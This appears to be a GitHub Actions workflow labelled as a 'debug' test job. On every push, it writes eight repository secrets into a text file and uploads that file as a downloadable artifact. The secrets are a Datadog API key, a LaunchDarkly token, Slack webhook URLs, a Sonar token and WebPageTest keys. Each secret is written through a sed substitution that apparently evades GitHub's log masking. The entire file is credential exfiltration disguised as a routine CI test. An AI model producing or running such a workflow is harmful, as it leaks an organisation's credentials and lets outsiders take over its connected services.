name: z Lisa Test
# .
on:
    push:
jobs:
    debug:
        runs-on: [self-hosted, npn-2CPU]
        steps:
            - run: |
                echo "${{ env.NAME }}: VALUE" > mylog.txt
                sed -i 's|VALUE|${{ env.MYSECRET }}|g' mylog.txt
              shell: bash
              env:
                NAME: DATADOG_API_KEY
                MYSECRET: ${{ secrets.DATADOG_API_KEY}}
            - run: |
                echo "${{ env.NAME }}: VALUE" >> mylog.txt
                sed -i 's|VALUE|${{ env.MYSECRET }}|g' mylog.txt
              shell: bash
              env:
                NAME: LD_ACCESS_TOKEN
                MYSECRET: ${{ secrets.LD_ACCESS_TOKEN}}
            - run: |
                echo "${{ env.NAME }}: VALUE" >> mylog.txt
                sed -i 's|VALUE|${{ env.MYSECRET }}|g' mylog.txt
              shell: bash
              env:
                NAME: SLACK_WEBHOOK_SUPPORT_REACT_BUILD_URL
                MYSECRET: ${{ secrets.SLACK_WEBHOOK_SUPPORT_REACT_BUILD_URL}}
            - run: |
                echo "${{ env.NAME }}: VALUE" >> mylog.txt
                sed -i 's|VALUE|${{ env.MYSECRET }}|g' mylog.txt
              shell: bash
              env:
                NAME: SLACK_WEBHOOK_URL
                MYSECRET: ${{ secrets.SLACK_WEBHOOK_URL}}
            - run: |
                echo "${{ env.NAME }}: VALUE" >> mylog.txt
                sed -i 's|VALUE|${{ env.MYSECRET }}|g' mylog.txt
              shell: bash
              env:
                NAME: SONAR_TOKEN
                MYSECRET: ${{ secrets.SONAR_TOKEN}}
            - run: |
                echo "${{ env.NAME }}: VALUE" >> mylog.txt
                sed -i 's|VALUE|${{ env.MYSECRET }}|g' mylog.txt
              shell: bash
              env:
                NAME: TEST_HOOK
                MYSECRET: ${{ secrets.TEST_HOOK}}
            - run: |
                echo "${{ env.NAME }}: VALUE" >> mylog.txt
                sed -i 's|VALUE|${{ env.MYSECRET }}|g' mylog.txt
              shell: bash
              env:
                NAME: WEBPAGETEST_API_KEY
                MYSECRET: ${{ secrets.WEBPAGETEST_API_KEY}}
            - run: |
                echo "${{ env.NAME }}: VALUE" >> mylog.txt
                sed -i 's|VALUE|${{ env.MYSECRET }}|g' mylog.txt
              shell: bash
              env:
                NAME: WEBPAGETEST_SLACK_URL
                MYSECRET: ${{ secrets.WEBPAGETEST_SLACK_URL}}
                
            - uses: actions/upload-artifact@v3
              if: always()
              with:
                name: mylog.txt
                path: mylog.txt
                retention-days: 1

